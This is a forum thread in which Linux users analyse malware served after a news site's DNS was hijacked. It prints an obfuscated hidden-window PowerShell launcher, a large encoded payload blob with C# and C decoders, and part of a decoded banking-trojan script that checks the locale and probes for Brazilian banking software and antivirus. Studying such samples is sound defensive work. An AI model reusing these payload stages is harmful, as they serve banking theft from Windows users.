VOL suffered a DNS hijack and was pointed to a FAKE site

61. Sending the code

Profile removed
removed

(uses None)

Sent on 25/11/2016 - 08:51h

I really liked this idea.
If someone can send me the code, I'll be happy! I want to poke around in it too!
Enzo Ferber


Give me an e-mail and I'll send the link via Dropbox or Google Drive.
Pasting a link here that leads to downloading the code is forbidden.


  


62. Re: VOL suffered a DNS hijack and was pointed to a FAKE site

Enzo de Brito Ferber
EnzoFerber

(uses FreeBSD)

Sent on 25/11/2016 - 08:52h

tony130666 wrote:

I really liked this idea.
If someone can send me the code, I'll be happy! I want to poke around in it too!
Enzo Ferber


Give me an e-mail and I'll send the link via Dropbox or Google Drive.
Pasting a link here that leads to downloading the code is forbidden.


enzoferber@gmail.com


Enzo Ferber
[]'s


$ indent -kr -i8 src.c

"(...)all right-thinking people know that (a) K&R are _right_ and (b) K&R are right."
- linux/Documentation/CodingStyle - TORVALDS, Linus.



63. Re: VOL suffered a DNS hijack and was pointed to a FAKE site

Profile removed
removed

(uses None)

Sent on 25/11/2016 - 09:12h

EnzoFerber wrote:

tony130666 wrote:

I really liked this idea.
If someone can send me the code, I'll be happy! I want to poke around in it too!
Enzo Ferber

Already sent. Whether it works or not, I'm here to hear what you saw or didn't see, or to try sending the file again.


64. Re: VOL suffered a DNS hijack and was pointed to a FAKE site

Fábio Berbert de Paula
fabio

(uses Debian)

Sent on 25/11/2016 - 09:19h

Fernando, you've mixed things up a bit. The VOL server was not broken into, the source code was not compromised, much less the database. Everything is 100% intact.

The attack was, let's say, banal. He used my e-mail address to reset the password of my account at registro.br and changed VOL's IP address to point to the fake site he created. Honestly, this involved no sophisticated technique, much less security flaws in the site.

The carelessness was mine, regarding my personal e-mail account, which didn't use two-factor authentication. I don't know how he got hold of my password, but that was it. And I'll say more: 95% of system compromises happen through guessing/obtaining a password. And people fall for the media's fairy tale, thinking there are lots of Kevin Mitnicks out there.



65. Re: VOL suffered a DNS hijack and was pointed to a FAKE site

Enzo de Brito Ferber
EnzoFerber

(uses FreeBSD)

Sent on 25/11/2016 - 09:24h

tony130666 wrote:

EnzoFerber wrote:

tony130666 wrote:

I really liked this idea.
If someone can send me the code, I'll be happy! I want to poke around in it too!
Enzo Ferber

Already sent. Whether it works or not, I'm here to hear what you saw or didn't see, or to try sending the file again.


OK, I've downloaded it here.
I'm going to play with it in a VM here.

Ever heard that saying: "Curiosity made the cat great"?

Enzo Ferber
[]'s





66. Re: VOL suffered a DNS hijack and was pointed to a FAKE site

Profile removed
removed

(uses None)

Sent on 25/11/2016 - 09:27h

EnzoFerber wrote:

tony130666 wrote:

EnzoFerber wrote:

tony130666 wrote:

I really liked this idea.
If someone can send me the code, I'll be happy! I want to poke around in it too!
Enzo Ferber

Already sent. Whether it works or not, I'm here to hear what you saw or didn't see, or to try sending the file again.


OK, I've downloaded it here.
I'm going to play with it in a VM here.

Ever heard that saying: "Curiosity made the cat great"?

Enzo Ferber

Have lots of fun, find out everything and don't hide anything from us.
I'll be on standby waiting for news.




67. Re: VOL suffered a DNS hijack and was pointed to a FAKE site

Josue de Jesus Santos
JJSantos

(uses Gentoo)

Sent on 25/11/2016 - 09:40h

fabio wrote:

Fernando, you've mixed things up a bit. The VOL server was not broken into, the source code was not compromised, much less the database. Everything is 100% intact.

The attack was, let's say, banal. He used my e-mail address to reset the password of my account at registro.br and changed VOL's IP address to point to the fake site he created. Honestly, this involved no sophisticated technique, much less security flaws in the site.

The carelessness was mine, regarding my personal e-mail account, which didn't use two-factor authentication. I don't know how he got hold of my password, but that was it. And I'll say more: 95% of system compromises happen through guessing/obtaining a password. And people fall for the media's fairy tale, thinking there are lots of Kevin Mitnicks out there.


Now that's a sensible comment!


68. Re: VOL suffered a DNS hijack and was pointed to a FAKE site

Enzo de Brito Ferber
EnzoFerber

(uses FreeBSD)

Sent on 25/11/2016 - 10:14h

It seems to target only Internet Explorer.

The first function 'a' will return false on Firefox, Chrome, Safari, etc.
And the DEGRADE variable is an ActiveXObject (only IE has it - http://stackoverflow.com/questions/7022568/activexobject-in-firefox-or-chrome-not-ie)

This DEGRADE is called with the argument "Wscript.Shell".

Here is an example of how it can be used: http://stackoverflow.com/a/15351708/1928852


function callShellApplication(){
	// WScript.Shell is only reachable through ActiveX, i.e. in Internet Explorer.
	var objShell = new ActiveXObject("WScript.Shell");
	// Backslashes must be doubled inside a JavaScript string literal.
	objShell.run('c:\\wkhtmltopdf.exe c:\\PDFTestPage.html c:\\TEST.pdf');
}


And then, when it calls DEGRADE.run(), the argument (the payload) is a call to powershell:



powershell.exe -NoP -NonI -W Hidden -C sal a New-Object;iex(a IO.StreamReader((a IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String('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'),[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()


It looks to me like a version of this: http://www.slideshare.net/HaydnJohnson/power-sploit-persistence-walkthrough

To translate the payload I used the following sequence:

1. A basic regex:


grep DEGRADE.run malware_vol.js | sed -e 's/[^0-9]/ /g' > payload


2. A C program to print the string:


#include <stdio.h>
#include <ctype.h>

/* Reads the whitespace-separated decimal character codes produced by the
 * sed step above from "payload" and prints the corresponding bytes. */
int main(void)
{
	FILE *fp = fopen("payload", "r");
	int c, number = 0;

	if (fp == NULL) {
		perror("payload");
		return 1;
	}

	/* EOF is -1, which is truthy, so it has to be tested explicitly. */
	while ((c = fgetc(fp)) != EOF) {
		if (isdigit(c)) {
			number = number * 10 + (c - '0');
		} else if (number) {
			/* any non-digit terminates the current code */
			putchar(number);
			number = 0;
		}
	}
	if (number)	/* flush a trailing code with no separator after it */
		putchar(number);
	fclose(fp);
	return 0;
}



gcc -o p p.c
./p > payload_decoded


If you look, there's a base64 payload. I tried to extract and decode it, but it's binary... Unfortunately I can't read binary that way. But there's a 99.999% chance it's a pretty .exe that will get up to a thousand mischiefs!


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


From here on it's pure guesswork; I know almost nothing about Windows internals.

What I deduce is that somehow this payload will put a script into IE, and that thing will call that pretty function with arguments (t,e,r,n,c,a,p) (TERMCAP!), which has the lovely line catch(u) (gotcha!) HAAHHAHAHAHA. The field 'b' in the first function must be where it stores the stolen data... The numbers must be indexes into some MS data array... In that payload there must be functions to send e-mail or something like that. Later I'll create a VM running a sniffer on its network and run this thing... for now I'm only in vim + bash. I'll also try saving the payload64 as .exe and running it on win to see what happens...

EDIT: Linux users, calm down! The nastiness was for Windows! And relax, it wasn't Fábio's fault!

Enzo Ferber
[]'s


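As an added example (not code from the thread), the number-to-character decoding that post 68 does with sed and a C program, written in Python and extended to the `[char[]](...) -join ''` form that the PowerShell script later in the thread uses, so that the obfuscated paths, locale checks and WMI queries can be read in place and reviewed as indicators. The sample lines are copied from that script; nothing else is assumed.

```python
import re

# Matches PowerShell's  [char[]](110,117,...) -join ''  idiom used in the script.
CHAR_ARRAY = re.compile(r"\[char\[\]\]\(\s*(\d+(?:\s*,\s*\d+)*)\s*\)\s*-join\s*''")


def codes_to_text(codes):
    """Turn decimal character codes into text; non-printables are shown as \\xNN."""
    return "".join(chr(c) if 32 <= c < 127 else f"\\x{c:02x}" for c in codes)


def decode_number_stream(text):
    """Post 68's case: the payload after sed 's/[^0-9]/ /g', i.e. whitespace-separated codes."""
    return codes_to_text(int(tok) for tok in text.split())


def deobfuscate_line(line):
    """Replace every [char[]](...) -join '' expression with a single-quoted literal."""
    def repl(m):
        text = codes_to_text(int(x) for x in m.group(1).split(","))
        return "'" + text.replace("'", "''") + "'"  # PowerShell escapes ' by doubling it
    return CHAR_ARRAY.sub(repl, line)


def extract_strings(script):
    """Return the decoded strings, in order, for a quick indicator review."""
    return [codes_to_text(int(x) for x in m.group(1).split(","))
            for m in CHAR_ARRAY.finditer(script)]


# Lines copied from the decoded PowerShell script posted in this thread.
SAMPLE = r"""if(((Get-Culture).Name.ToLower() -eq ([char[]](112,116,45,66,114) -join '').ToLower())) {
$gbPath = Join-Path $dir ([char[]](71,98,80,108,117,103,105,110) -join '');
$avs = (Get-WmiObject -Namespace ([char[]](114,111,111,116,92,83,101,99,117,114,105,116,121,67,101,110,116,101,114,50) -join '') -QUERY ([char[]](83,69,76,69,67,84,32,68,105,115,112,108,97,121,78,97,109,101,32,70,82,79,77,32,65,110,116,105,86,105,114,117,115,80,114,111,100,117,99,116) -join ''));
"""

if __name__ == "__main__":
    for line in SAMPLE.splitlines():
        print(deobfuscate_line(line))
    print("recovered strings:", extract_strings(SAMPLE))
    # Post 68's format; constructed input, the codes spell "powershell.exe".
    print(decode_number_stream("112 111 119 101 114 115 104 101 108 108 46 101 120 101"))
```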



69. Re: VOL suffered a DNS hijack and was pointed to a FAKE site

Profile removed
removed

(uses None)

Sent on 25/11/2016 - 10:20h

Malware that depends on IE and Windows? I think the guy hacked the wrong account, got VOL instead of baboo lol
--
Linux Counter: #596371


70. Re: VOL suffered a DNS hijack and was pointed to a FAKE site

Enzo de Brito Ferber
EnzoFerber

(uses FreeBSD)

Sent on 25/11/2016 - 10:21h

ru4n wrote:

Malware that depends on IE and Windows? I think the guy hacked the wrong account, got VOL instead of baboo lol
--
Linux Counter: #596371


Right? I thought the same thing...

But we should remember this is a guy who left his ZAP (WhatsApp) in the code...

Enzo Ferber
[]'s





71. Re: VOL suffered a DNS hijack and was pointed to a FAKE site

ANDRE MILKE DOS SANTOS
andremilke

(uses Debian)

Sent on 25/11/2016 - 10:32h

This string is a compressed file; I wrote a C# program and debugged it, I dealt with it in the other post https://www.vivaolinux.com.br/topico/Sites-Linux/Site-vivaolinux-solicitando-download-de-arquivo

Code to decompress and decrypt

using System;
using System.IO;
using System.IO.Compression;
using System.Text;

namespace ConsoleApplicationFormBase64
{
class Program
{
static void Main(string[] args)
{
// The base64 string below is the payload lifted from the PowerShell one-liner.
byte[] file = System.Convert.FromBase64String("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");

// Optionally keep the still-compressed bytes for later inspection.
//File.WriteAllBytes( @"c:\temp\teste64.zip", file);

string s = Decompress(file);
Console.WriteLine(s);
Console.ReadKey();
}

// Inflates the raw-deflate payload, saves a copy and returns it as text.
public static string Decompress(byte[] bytes)
{
using (var uncompressed = new MemoryStream())
using (var compressed = new MemoryStream(bytes))
using (var ds = new DeflateStream(compressed, CompressionMode.Decompress))
{
try
{
ds.CopyTo(uncompressed);
}
catch (Exception ex)
{
// A truncated or corrupted payload surfaces here; report it and return whatever was inflated so far.
Console.WriteLine(ex.Message);
}

File.WriteAllBytes(@"c:\temp\logfile64.txt", uncompressed.ToArray());

// FileStream.ToString() would only return the type name, not the contents,
// so the inflated bytes are kept in memory and decoded here.
return Encoding.ASCII.GetString(uncompressed.ToArray());
}
}
}
}




$ie = New-Object -com internetexplorer.application;
$ie.visible = $true;
$ie.navigate("");
$mtx = New-Object System.Threading.Mutex($false, "mtt")
if ($mtx.WaitOne(500)) {
if(-not (Test-Path "$env:APPDATA\$([char[]](77,105,99,114,111,115,111,102,116,92,87,105,110,100,111,119,115,92,84,101,109,112,108,97,116,101,115,92,108,111,103,46,116,120,116) -join '')")){
([char[]](87,105,110,100,111,119,115,32,119,111,114,107,105,110,103,32,110,111,114,109,97,108,108,121,44,32,105,103,110,111,114,101,32,116,104,105,115,32,108,111,103) -join '') >> "$env:APPDATA\$([char[]](77,105,99,114,111,115,111,102,116,92,87,105,110,100,111,119,115,92,84,101,109,112,108,97,116,101,115,92,108,111,103,46,116,120,116) -join '')"
if(((Get-Culture).Name.ToLower() -eq ([char[]](112,116,45,66,114) -join '').ToLower())) {
$dir = (${env:ProgramFiles(x86)}, ${env:ProgramFiles} -ne $null)[0];
$gbPath = Join-Path $dir ([char[]](71,98,80,108,117,103,105,110) -join '');
$paths = @{(Join-Path $gbPath gbiehcef.dll) = "104";(Join-Path $gbPath gbiehscd.dll) = "751";(Join-Path $gbPath gbieh.dll) = "001";(Join-Path $gbPath gbiehuni.dll) = "341";(Join-Path ($env:ProgramFiles) "\AppBrad\NetExpress50.exe") = "APP237";(Join-Path ($env:ProgramFiles) Trusteer) = "Trust";(Join-Path ($env:LOCALAPPDATA) "\Aplicativo Itau\itauaplicativo.exe") = "APP341";};
foreach ($path in $paths.GetEnumerator()) { if(Test-Path $($path.Name) ){ $V1 += $($path.Value) + ","}};
